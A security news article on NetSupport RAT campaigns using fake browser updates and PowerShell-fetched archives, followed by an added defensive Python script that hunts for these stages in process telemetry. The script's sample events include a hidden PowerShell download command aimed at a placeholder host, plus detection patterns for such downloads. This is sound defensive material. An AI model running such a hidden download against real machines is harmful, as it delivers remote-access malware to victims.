NetSupport RAT Deployed Against Multiple Targets
Education, government, and business services sectors are currently under threat from malicious actors employing a remote access trojan named NetSupport RAT. According to a report from VMware Carbon Black researchers shared with The Hacker News, the delivery methods for this trojan include deceptive updates, drive-by downloads, the use of malware loaders like GHOSTPULSE, and various phishing campaigns.
NetSupport RAT Scores Over a Dozen Hits
In the past few weeks, the cybersecurity firm has identified at least 15 new infections associated with NetSupport RAT. NetSupport Manager was originally designed as a legitimate remote administration tool, but malicious actors have abused it as a gateway for subsequent attacks. The trojan commonly reaches a victim's computer through deceptive websites and counterfeit browser updates.
Sucuri highlighted an August 2022 campaign involving compromised WordPress sites that displayed fake Cloudflare DDoS protection pages, ultimately leading to the distribution of NetSupport RAT.
The use of fraudulent web browser updates aligns with the tactics associated with SocGholish, a JavaScript-based downloader malware. SocGholish has also been observed spreading a loader malware named BLISTER.
The JavaScript payload triggers PowerShell to establish a connection with a remote server, retrieving a ZIP archive file containing NetSupport RAT. Once installed, the trojan communicates with a command-and-control (C2) server. With NetSupport RAT on a victim's device, malicious actors gain the ability to monitor activities, transfer files, alter computer configurations, and propagate to other devices within the network, according to the researchers.
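For defenders, the chain described above (a script launching PowerShell to fetch an archive, followed by the remote-access client running) can be hunted in process-creation telemetry. The sketch below is an added example, not code from the researchers' report. The event fields and sample events are constructed. The client32.exe file name and the idea that a managed install lives under Program Files are assumptions drawn from general knowledge of NetSupport Manager, not from the article.

```python
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Tokens that indicate PowerShell retrieving remote content.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring"
                         r"|net\.webclient|start-bitstransfer", re.IGNORECASE)
# Assumption (not on the page): the NetSupport client binary is client32.exe and a
# managed install sits under Program Files, not in a user-writable directory.
USER_WRITABLE_RE = re.compile(r"\\(appdata|temp|programdata|users\\public)\\", re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the stage name a process-creation event matches, or None."""
    image, parent = basename(event["image"]), basename(event["parent"])
    if parent in SCRIPT_HOSTS and image in POWERSHELL and DOWNLOAD_RE.search(event["cmdline"]):
        return "script-host-powershell-download"
    if image == "client32.exe" and USER_WRITABLE_RE.search(event["image"]):
        return "netsupport-client-user-path"
    return None

def triage(events):
    """Group matched stages per host; both stages on one host rates 'high'."""
    stages = defaultdict(set)
    for ev in events:
        stage = classify(ev)
        if stage:
            stages[ev["host"]].add(stage)
    return {h: ("high" if len(s) == 2 else "medium", sorted(s)) for h, s in stages.items()}

# Constructed sample events (Sysmon-style process-creation fields), not from the report.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden Invoke-WebRequest https://example.invalid/a.zip -OutFile a.zip"},
    {"host": "ws-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\AppData\Roaming\upd\client32.exe", "cmdline": "client32.exe"},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe",  # benign interactive PowerShell
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem"},
    {"host": "it-03", "parent": r"C:\Windows\System32\services.exe",  # managed install
     "image": r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe",
     "cmdline": "client32.exe"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

Because NetSupport Manager is a legitimate product, the path check is what separates a sanctioned deployment from a dropped copy; tune the allow-listed install locations to the environment.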